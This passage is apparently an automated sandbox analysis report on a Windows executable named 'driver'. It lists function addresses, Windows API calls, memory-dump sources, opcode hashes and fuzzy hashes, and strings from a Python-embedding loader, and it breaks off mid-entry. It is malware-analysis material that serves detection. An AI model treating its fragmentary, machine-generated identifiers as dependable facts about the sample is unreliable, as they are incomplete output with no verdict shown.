Instruction Fuzzy Hash: A1E08C50F8B64247FF0C6BB3A8661B912A16F88F88F454034DC1DC22A3EEAC7885B300

Function 00007FF6A29CABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC36
GetLastError.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC40

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 6cbaf254e8af50c7a1a333f7f4cc45dd2f85b16513f45232177e9ebc722cf1ae
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 9321C921F9E64246FAD45B63D4943B912926F84FA8F084239D91EC73C3DEECF4456301

Function 00007FF6A29CBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBF44

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 8d5985ee5f3c6c11994a77b79460bb9d5ea420ea99a8f76aaea311e4cf2306d2
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 9D41C232A4A2018BEA34DB17A55027D77A5EB55F98F140131EA8EC3792CFADF402EB51

Function 00007FF6A29B7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6A29B802A

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
Instruction ID: d8e74b0e728e09b6aa21c61caea39c79d4c6d026dae64044f200c5f44ffd8338
Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
Instruction Fuzzy Hash: 3221A321B8A65289FA149A1369043FA9651BF49FCCF8C5430EE4D87787CEBDE042A601

Function 00007FF6A29CB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBA32

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 0ca300ebdfacd212c790755f9d8e081d95734f5266d70d90ba69dbed48f93e67
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 8531AE22A5A64289F7515B57885137C36A1AF40F9CF520135E96D833D3CFFCF851A721

Function 00007FF6A29C99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6A29C99FF

Part of subcall function 00007FF6A29C9AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF6A29C9B1D
Part of subcall function 00007FF6A29C9AF8: GetProcAddress.KERNEL32 ref: 00007FF6A29C9B33
Part of subcall function 00007FF6A29C9AF8: FreeLibrary.KERNEL32 ref: 00007FF6A29C9B5A

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: b59d241ff1f0d1c1bccc42cf52132d3bdac714f3136121757b7cb84a82bc4548
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 02216B32A466828EFB248F65C4443FC33A0EB08F1CF441635D62D86AD6DFB8E584DB50

Function 00007FF6A29C6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C5F69

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: b19c2d8bec1afd658c8699d7ed7b117ee2b773e9c62324a95e810f2c97f1e2d9
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: DD119322A5E6418AFA649F13D4102BEA260EF45F88F444031EB4CE7A97DFBCF400A700

Function 00007FF6A29D63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D63E7

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 829dfdb0357ff83dc32e141c7a0253004ebbd566023a4ded59427df2187ccbc8
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 3821C97265964187DB658F19E44037977E1FB84F98F144234EA9DC76DADF7CE400AB00

Function 00007FF6A29C042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C0480

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 069820f5a8b75d1a2d4c780924124f5d940fe3188c43fd58548f20eb99e46ba7
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 4401D621B4974145EA04DF53990117AA691BF85FE8F084631EE5C97FD7DEBCF111A300

Function 00007FF6A29C7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C7FAA

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: f38ba09ba284a4001f2a6becd97e30f0fe5aecad3c7de0874d1b3c94f7f534ed
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: FD018020E8F24348FAA46B23A5812B951A8AF04FDCF544635FA5DC27C7DFFCB441A201

Function 00007FF6A29C82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C82C1

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 4870598409feb9e385c44b56a1b0a7e7f3a4c5167f7ebecf35961490dec21240
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 3DE0C2A0F8A6078EF7553AB748C61B92020AF45F88F405430ED08C62C7DEAC7C58B222

Function 00007FF6A29CEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6A29CB39A,?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA), ref: 00007FF6A29CEC5D

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 6bf94e5cc2c96123860a8b9f4cc1e3db2b0ca14673da563c4a2a9294f805c997
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 4FF06D44BCB30649FE5A5B6399622B552845F98F88F4C5430CD4FCA3D3DE9CF490A210

Function 00007FF6A29CD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6A29C0D00,?,?,?,00007FF6A29C236A,?,?,?,?,?,00007FF6A29C3B59), ref: 00007FF6A29CD6AA

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 8ab37ece2347d4b0b77f19b99d37de510f9f04e0c0dd54ef45faa92d2e629520
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 36F05800B8B74659FE647B635A112B952904F94FA8F081230DC2EC63C3DEACF4A0F620

Non-executed Functions

Function 00007FF6A29B5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5830
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5842
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5879
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B588B
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58A4
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58B6
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58CF
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58E1
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58FD
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B590F
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B592B
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B593D
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5959
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B596B
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5987
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5999
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59B5
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59C7

Strings

PyObject_GetAttrString, xrefs: 00007FF6A29B5D43, 00007FF6A29B5D65
PyImport_AddModule, xrefs: 00007FF6A29B5BD3, 00007FF6A29B5BF5
PySys_GetObject, xrefs: 00007FF6A29B5E57, 00007FF6A29B5E79
GetProcAddress, xrefs: 00007FF6A29B5858
PyImport_ImportModule, xrefs: 00007FF6A29B5C2F, 00007FF6A29B5C51
Py_IsInitialized, xrefs: 00007FF6A29B5921, 00007FF6A29B5943
PyObject_Str, xrefs: 00007FF6A29B5D9F, 00007FF6A29B5DC1
PyUnicode_FromFormat, xrefs: 00007FF6A29B5F3D, 00007FF6A29B5F5F
PyUnicode_Decode, xrefs: 00007FF6A29B5EE1, 00007FF6A29B5F03
PyErr_NormalizeException, xrefs: 00007FF6A29B5AED, 00007FF6A29B5B0F
PyMem_RawFree, xrefs: 00007FF6A29B5C8B, 00007FF6A29B5CAD
Py_DecodeLocale, xrefs: 00007FF6A29B586F, 00007FF6A29B5891
PyObject_CallFunctionObjArgs, xrefs: 00007FF6A29B5D15, 00007FF6A29B5D37
PyEval_EvalCode, xrefs: 00007FF6A29B5BA5, 00007FF6A29B5BC7
PyUnicode_Join, xrefs: 00007FF6A29B5F99, 00007FF6A29B5FBB
PyStatus_Exception, xrefs: 00007FF6A29B5E29, 00007FF6A29B5E4B
Py_ExitStatusException, xrefs: 00007FF6A29B589A, 00007FF6A29B58BC
PyUnicode_Replace, xrefs: 00007FF6A29B5FC7, 00007FF6A29B5FE9
PySys_SetObject, xrefs: 00007FF6A29B5E85, 00007FF6A29B5EA7
PyImport_ExecCodeModule, xrefs: 00007FF6A29B5C01, 00007FF6A29B5C23
PyModule_GetDict, xrefs: 00007FF6A29B5CB9, 00007FF6A29B5CDB
Py_Finalize, xrefs: 00007FF6A29B58C5, 00007FF6A29B58E7
PyErr_Clear, xrefs: 00007FF6A29B5A91, 00007FF6A29B5AB3
PyConfig_SetString, xrefs: 00007FF6A29B5A35, 00007FF6A29B5A57
PyUnicode_AsUTF8, xrefs: 00007FF6A29B5EB3, 00007FF6A29B5ED5
Py_DecRef, xrefs: 00007FF6A29B5826, 00007FF6A29B5848
Py_InitializeFromConfig, xrefs: 00007FF6A29B58F3, 00007FF6A29B5915
PyObject_SetAttrString, xrefs: 00007FF6A29B5D71, 00007FF6A29B5D93
PyConfig_InitIsolatedConfig, xrefs: 00007FF6A29B59AB, 00007FF6A29B59CD
PyConfig_Clear, xrefs: 00007FF6A29B597D, 00007FF6A29B599F
Py_PreInitialize, xrefs: 00007FF6A29B594F, 00007FF6A29B5971
PyConfig_SetWideStringList, xrefs: 00007FF6A29B5A63, 00007FF6A29B5A85
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6A29B5DCD, 00007FF6A29B5DEF
PyMarshal_ReadObjectFromString, xrefs: 00007FF6A29B5C5D, 00007FF6A29B5C7F
PyErr_Fetch, xrefs: 00007FF6A29B5ABF, 00007FF6A29B5AE1
PyErr_Restore, xrefs: 00007FF6A29B5B77, 00007FF6A29B5B99
PyUnicode_DecodeFSDefault, xrefs: 00007FF6A29B5F0F, 00007FF6A29B5F31
PyRun_SimpleStringFlags, xrefs: 00007FF6A29B5DFB, 00007FF6A29B5E1D
PyErr_Occurred, xrefs: 00007FF6A29B5B1B, 00007FF6A29B5B3D
PyUnicode_FromString, xrefs: 00007FF6A29B5F6B, 00007FF6A29B5F8D
PyErr_Print, xrefs: 00007FF6A29B5B49, 00007FF6A29B5B6B
PyConfig_SetBytesString, xrefs: 00007FF6A29B5A07, 00007FF6A29B5A29
PyObject_CallFunction, xrefs: 00007FF6A29B5CE7, 00007FF6A29B5D09
PyConfig_Read, xrefs: 00007FF6A29B59D9, 00007FF6A29B59FB
Failed to get address for %hs, xrefs: 00007FF6A29B5851

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 1a4a8b8ae3738dd822fd62e5b595c0371242586de205768acc21d5c28d3092ec
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 1F229F24ACBB4791FA549B57E8241B423E1BF08F9DF845139D81E82667FFFCA548B240

Function 00007FF6A29D411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6A29D416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D47D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D4C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D4E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D5067
memcpy_s.LIBCPMT ref: 00007FF6A29D5142
memcpy_s.LIBCPMT ref: 00007FF6A29D51ED
memcpy_s.LIBCPMT ref: 00007FF6A29D52BC

Strings

1#IND, xrefs: 00007FF6A29D4257
1#SNAN, xrefs: 00007FF6A29D427A
1#INF, xrefs: 00007FF6A29D4293
1#QNAN, xrefs: 00007FF6A29D4283

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 6322075f8956265f1e934496d328a510968f51bd2d7efc8dece4a333e16640ed
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: CFB2E772A592828BE7248E66D5407FD37E1FB54B8CF406135DE0D97A86DFBCA900EB40

Function 00007FF6A29BAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

